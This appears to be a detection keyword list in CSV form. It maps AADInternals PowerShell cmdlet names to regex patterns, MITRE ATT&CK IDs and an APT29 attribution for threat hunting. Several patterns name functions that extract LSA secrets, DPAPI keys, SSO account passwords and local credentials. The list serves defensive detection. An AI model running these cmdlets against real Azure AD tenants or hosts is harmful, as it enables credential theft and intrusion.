"*Get-AADIntAzureSubscriptions*",".{0,1000}Get\-AADIntAzureSubscriptions.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureTenants*",".{0,1000}Get\-AADIntAzureTenants.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureVMRdpSettings*",".{0,1000}Get\-AADIntAzureVMRdpSettings.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureVMs*",".{0,1000}Get\-AADIntAzureVMs.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntAzureWireServerAddress*",".{0,1000}Get\-AADIntAzureWireServerAddress.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntB2CEncryptionKeys*",".{0,1000}Get\-AADIntB2CEncryptionKeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntCache*",".{0,1000}Get\-AADIntCache.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntCertificate*",".{0,1000}Get\-AADIntCertificate.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntCompanyInformation*",".{0,1000}Get\-AADIntCompanyInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntCompanyInformation.*",".{0,1000}Get\-AADIntCompanyInformation\..{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntCompanyTags*",".{0,1000}Get\-AADIntCompanyTags.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntComplianceAPICookies*",".{0,1000}Get\-AADIntComplianceAPICookies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntConditionalAccessPolicies*",".{0,1000}Get\-AADIntConditionalAccessPolicies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntDesktopSSOAccountPassword*",".{0,1000}Get\-AADIntDesktopSSOAccountPassword.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntDeviceCompliance*",".{0,1000}Get\-AADIntDeviceCompliance.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntDeviceRegAuthMethods*",".{0,1000}Get\-AADIntDeviceRegAuthMethods.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntDevices*",".{0,1000}Get\-AADIntDevices.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntDeviceTransportKey*",".{0,1000}Get\-AADIntDeviceTransportKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntDiagnosticSettingsDetails*",".{0,1000}Get\-AADIntDiagnosticSettingsDetails.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntDPAPIKeys*",".{0,1000}Get\-AADIntDPAPIKeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntEASAutoDiscover*",".{0,1000}Get\-AADIntEASAutoDiscover.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntEASAutoDiscoverV1*",".{0,1000}Get\-AADIntEASAutoDiscoverV1.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntEASOptions*",".{0,1000}Get\-AADIntEASOptions.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntEndpointInstances*",".{0,1000}Get\-AADIntEndpointInstances.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntEndpointIps*",".{0,1000}Get\-AADIntEndpointIps.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntError*",".{0,1000}Get\-AADIntError.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntFOCIClientIDs*",".{0,1000}Get\-AADIntFOCIClientIDs.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntGlobalAdmins*",".{0,1000}Get\-AADIntGlobalAdmins.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntHybridHealthServiceAccessToken*",".{0,1000}Get\-AADIntHybridHealthServiceAccessToken.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntHybridHealthServiceAgentInfo*",".{0,1000}Get\-AADIntHybridHealthServiceAgentInfo.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntHybridHealthServiceBlobUploadKey*",".{0,1000}Get\-AADIntHybridHealthServiceBlobUploadKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntHybridHealthServiceEventHubPublisherKey*",".{0,1000}Get\-AADIntHybridHealthServiceEventHubPublisherKey.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntHybridHealthServiceMemberCredentials*",".{0,1000}Get\-AADIntHybridHealthServiceMemberCredentials.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntHybridHealthServiceMembers*",".{0,1000}Get\-AADIntHybridHealthServiceMembers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntHybridHealthServiceMonitoringPolicies*",".{0,1000}Get\-AADIntHybridHealthServiceMonitoringPolicies.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntHybridHealthServices*",".{0,1000}Get\-AADIntHybridHealthServices.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntIdentityTokenByLiveId*",".{0,1000}Get\-AADIntIdentityTokenByLiveId.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntImmutableID*",".{0,1000}Get\-AADIntImmutableID.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntKerberosDomainSyncConfig*",".{0,1000}Get\-AADIntKerberosDomainSyncConfig.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntKerberosTicket*",".{0,1000}Get\-AADIntKerberosTicket.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntLocalDeviceJoinInfo*",".{0,1000}Get\-AADIntLocalDeviceJoinInfo.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntLocalUserCredentials*",".{0,1000}Get\-AADIntLocalUserCredentials.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntLoginInformation*",".{0,1000}Get\-AADIntLoginInformation.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntLSABackupKeys*",".{0,1000}Get\-AADIntLSABackupKeys.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntLSASecrets*",".{0,1000}Get\-AADIntLSASecrets.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntMobileDevices*",".{0,1000}Get\-AADIntMobileDevices.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntMSPartnerContracts*",".{0,1000}Get\-AADIntMSPartnerContracts.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntMSPartnerOffers*",".{0,1000}Get\-AADIntMSPartnerOffers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntMSPartnerOrganizations*",".{0,1000}Get\-AADIntMSPartnerOrganizations.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntMSPartnerPublishers*",".{0,1000}Get\-AADIntMSPartnerPublishers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntMSPartnerRoleMembers*",".{0,1000}Get\-AADIntMSPartnerRoleMembers.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
"*Get-AADIntMSPartners*",".{0,1000}Get\-AADIntMSPartners.{0,1000}","greyware_tool_keyword","AADInternals","AADInternals PowerShell module for administering Azure AD and Office 365","T1583 - T1558 - T1078 - T1136 - T1087 - T1114 - T1566 - T1056 - T1199 - T1098 - T1649 - T1621 - T1649","TA0006 - TA0003 - TA0004 - TA0005 - TA0007 - TA0009 - TA0011","N/A","APT29","Exploitation tool","https://github.com/Gerenios/AADInternals","1","0","N/A","N/A","9","10","1228","214","2024-07-31T07:21:22Z","2018-10-25T17:35:16Z"
